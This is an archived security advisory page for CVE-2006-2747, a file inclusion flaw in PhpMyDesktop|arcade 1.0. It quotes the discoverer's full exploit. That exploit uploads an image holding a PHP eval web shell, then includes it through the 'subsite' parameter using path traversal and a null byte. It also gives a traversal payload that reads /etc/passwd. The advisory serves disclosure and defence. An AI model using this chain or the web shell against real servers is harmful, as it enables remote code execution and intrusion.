SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PhpMyDesktop|arcade Vendors:   pmd-arcade.sourceforge.net
PhpMyDesktop|arcade Include File Bug in 'subsite' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016180
SecurityTracker URL:  http://securitytracker.com/id/1016180
CVE Reference:   CVE-2006-2747   (Links to External Site)
Updated:  Aug 17 2009
Original Entry Date:  May 30 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0 FINAL
Description:   A vulnerability was reported in PhpMyDesktop|arcade. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'subsite' parameter. A remote user can upload an image file containing PHP code. Then, the remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the uploaded file. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

/phpmydesktop1/index.php?todo=showsubsite&subsite=../../../../../../../../var/www/html/phpmydesktop1/uploads/images/imagename.jpg%00

darkgod discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  pmd-arcade.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  phpMyDesktop|arcade 1.0 FINAL Code Execution

phpMyDesktop|arcade 1.0 FINAL

	Code Execution Exploit


found-by: darkgod (darkgod.xsf@gmail.com)

links: criticalsecurity.NET, hackthissite.org, hacbloc.org


video-@: http://dgod.dajoob.com/videos/phpmydesktoparcade.rar


phpMyDesktop|arcade is a php-based 'bridge' between a game and message board.

Its got a very nice interface, and many customiseable options.




Unfortunately, it suffers from two [three.] vulnerabilities.


1. Images are not checked for validity.

	This may not be a vuln in itself -- because code won't execute inside images. But you could

	mess with Internet Explorer, which in some versions allow HTML inside of images.


2. GET variable 'subsite' not sanitized.

	todo=showsubsite&subsite=../../../../../../../../../../../etc/passwd%00

	(example.)



Now, how does this allow code execution, you ask?


We upload our image with content of: <?php eval(stripslashes($_GET['code'])); ?>


To upload, you must post in one of the blocks. It will NOT POST YOUR CONTENT. This is because

it is trying first to create a thumbnail of your image, which is invalid, so it will bork.

But the image still gets uploaded.


So, now we use the second vulnerability.


Firstly, we must get to the 'top' of the drive, and find our way back. Create an error with it first,

so you can see the full path (let's say its /var/www/html/phpmydesktop1/.)


So, in order to get our code, you must do:


../../../../../../../../var/www/html/phpmydesktop1/uploads/images/imagename.jpg%00


And assuming you uploaded what I said, the file query (in your addressbar)

will look like:


/phpmydesktop1/index.php?todo=showsubsite&subsite=../../../../../../../../var/www/html/phpmydesktop1/uploads/images/imagename.jpg%00


And add a &code=print('h0n0r');

To execute any code you wish.



dgod.


Vulnerability Status:

Over at pmd-arcade.sourceforge.net, their contact & support page is down, so I see no easy way of contacting them.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC